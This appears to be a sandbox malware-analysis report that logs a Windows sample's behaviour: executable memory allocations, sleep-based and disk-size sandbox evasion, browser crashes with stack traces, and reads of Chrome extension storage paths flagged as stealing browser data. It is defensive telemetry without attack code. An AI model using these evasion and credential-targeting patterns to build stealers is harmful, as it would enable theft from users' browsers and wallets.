NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 2056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 region_size: 13307904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03090000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03d40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	6Lfr2_JvDPSQIOljUsEY.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds
description	bugai.exe tried to sleep 375 seconds, actually delayed analysis time by 375 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 16, 2024, 7:57 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (17 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 1728 crashed
Application Crash	Process chrome.exe with pid 2260 crashed
Application Crash	Process chrome.exe with pid 2896 crashed
Application Crash	Process chrome.exe with pid 1064 crashed
Application Crash	Process chrome.exe with pid 3124 crashed
Application Crash	Process firefox.exe with pid 3688 crashed
Application Crash	Process firefox.exe with pid 3824 crashed
Application Crash	Process firefox.exe with pid 3856 crashed
__exception__ Feb. 16, 2024, 7:59 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 113831648 registers.edi: 102566964 registers.eax: 113831648 registers.ebp: 113831728 registers.edx: 91 registers.ebx: 113832012 registers.esi: 2147746133 registers.ecx: 4908704	1	0	0
__exception__ Feb. 16, 2024, 7:59 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7176540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x717652ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71840ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 74112432 registers.edi: 1953561104 registers.eax: 74112432 registers.ebp: 74112512 registers.edx: 1 registers.ebx: 4521948 registers.esi: 2147746133 registers.ecx: 1529172443	1	0	0
__exception__ Feb. 16, 2024, 7:59 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 192145872 registers.r15: 192146312 registers.rcx: 1344 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 53246096 registers.rsp: 192145032 registers.r11: 192149568 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1328 registers.r12: 7381072 registers.rbp: 192145184 registers.rdi: 7320240 registers.rax: 4861440 registers.r13: 192145744	1	0	0
__exception__ Feb. 16, 2024, 7:58 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 190049104 registers.r15: 190049544 registers.rcx: 1180 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 94227392 registers.rsp: 190048264 registers.r11: 190052800 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1260 registers.r12: 32748752 registers.rbp: 190048416 registers.rdi: 32748496 registers.rax: 5910016 registers.r13: 190048976	1	0	0
__exception__ Feb. 16, 2024, 7:59 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 188280640 registers.r15: 188281080 registers.rcx: 1328 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 77821088 registers.rsp: 188279800 registers.r11: 188284336 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1308 registers.r12: 7124256 registers.rbp: 188279952 registers.rdi: 6861504 registers.rax: 4926976 registers.r13: 188280512	1	0	0
__exception__ Feb. 16, 2024, 7:59 a.m.	stacktrace: 0x1b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1b2e04 registers.r14: 188476160 registers.r15: 188476600 registers.rcx: 1360 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 78578032 registers.rsp: 188475336 registers.r11: 188479856 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1372 registers.r12: 32421136 registers.rbp: 188475472 registers.rdi: 32158384 registers.rax: 1781248 registers.r13: 188476032	1	0	0
__exception__ Feb. 16, 2024, 7:51 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9107136 registers.r15: 9106640 registers.rcx: 48 registers.rsi: 14751296 registers.r10: 0 registers.rbx: 0 registers.rsp: 9105688 registers.r11: 9107888 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092883536 registers.r12: 9106471 registers.rbp: 9105808 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 16, 2024, 7:51 a.m.	stacktrace: 0xcc1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcc1f04 registers.r14: 9106184 registers.r15: 8791496038000 registers.rcx: 48 registers.rsi: 8791495969664 registers.r10: 0 registers.rbx: 0 registers.rsp: 9105816 registers.r11: 9109200 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092883536 registers.r12: 14907904 registers.rbp: 9105936 registers.rdi: 268545824 registers.rax: 13377280 registers.r13: 9106776	1	0	0
__exception__ Feb. 16, 2024, 7:51 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8583696 registers.r15: 8583200 registers.rcx: 48 registers.rsi: 14707008 registers.r10: 0 registers.rbx: 0 registers.rsp: 8582248 registers.r11: 8584448 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 8583031 registers.rbp: 8582368 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0

Steals private information from local Internet browsers (50 out of 2386 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
